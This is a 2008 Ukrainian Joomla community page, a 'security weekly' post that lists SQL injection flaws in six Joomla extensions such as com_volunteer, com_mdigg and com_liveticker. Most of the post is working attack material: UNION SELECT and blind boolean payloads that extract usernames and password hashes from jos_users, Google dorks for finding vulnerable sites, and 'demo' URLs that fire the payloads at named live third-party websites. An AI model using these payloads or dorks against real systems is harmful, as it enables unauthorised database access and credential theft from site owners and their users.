Тижневик безпеки №01 - Спільнота Joomla! Україна

Головна Статті та огляди Новини Форум Чат Wiki Продукти Контакти RSS Архів

Новини

Новини Joomla! CMS

Новини розширень Joomla!

Новини Joomla! Україна

Новини безпеки

Новини мережі

Додати новину

Переклад

Українська локалізація для Joomla! 1.5.18 Stable

Українська локалізація для Joomla 1.0.15

Завантажити Joomla

Стабільна стара версія Joomla! 1.0.15

Форум

Хостинг для Joomla
Як вибрати хостинг? Реєстрація домену для сайту Реєструємо безкоштовно домен Яку платформу вибрати для Joomla: UNIX чи Windows?

Дискламація

Joomla!^TM є торговою маркою компанії Open Source Matters inc. в США та інших країнах. Назва Joomla! і його варіації, такі як J, Joom тощо, використовуються в рамках обмеженою ліцензії, певною компанією Open Source Matters. Спільнота Joomla! Україна не відноситься до компанії Open Source Matters або проекту Joomla! Точки зору представлені на даному сайті не є офіційними точками зору Joomla Project або Open Source Matters.

Торгова марка Joomla^® і логотип використовуються в рамках обмеженою ліцензії, наданої Open Source Matters.

Популяні розширення

Безкоштовні шаблони для Joomla 1.5

RokCodepress - заміна візуальному редактору

Новий реліз Community Builder

Модуль новин DGM NEWS ULTRA Plus Lite RC1

Інтеграція форуму phpBB 3.0 з Joomla 1.5

eXtplorer 2.0.0 RC1 - менеджер файлів

мужские ремни в подарок портфель, брелок, галстук
Санаторий Горького Кисловодск отзывы

Головна Новини безпеки Тижневик безпеки №01

Тижневик безпеки №01

Написав Dutch

28.12.2008

За тиждень, який минає знайдено вразливості у наступних розширеннях: mdigg 2.2.8, Live Ticker 1.0, Ice Gallery 0.5b2, com_allhotels, com_lowcosthotels, Volunteer 2.0.

com_volunteer (job_id) SQL-ін’єкція

Приклад:

http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Експойт:

-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

Демо:

http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1

com_lowcosthotels (id) SQL-ін’єкція

Скрипт: http://www.joomlahbs.com/

DorK: inurl:index.php?option=com_lowcosthotels

Демо:

com_allhote

http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4%20%20%20

http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5

ls (id) SQL-ін’єкція

Скрипт:

http://www.joomlahbs.com/ та http://www.leveltensolutions.net/spa/

DorK: inurl:index.php?option=com_allhotels

Демо:

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

com_ice (catid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_ice&⁞catid=1[SQL code]

SQL код:

and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96

com_liveticker (tid) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]

Демо:

http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)

http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)

com_mdigg (category) SQL-ін’єкція

Приклад:

http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]

Експойт:

-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

Додати коментар

JComments

сайт русских слов к песням текстсонг
на cdtmaster-class.com есть видеопрезентации о CDT на русском языке

Використання матеріалів сайту можливе лише при згоді адміністрації та активного посилання. Всі права захищено!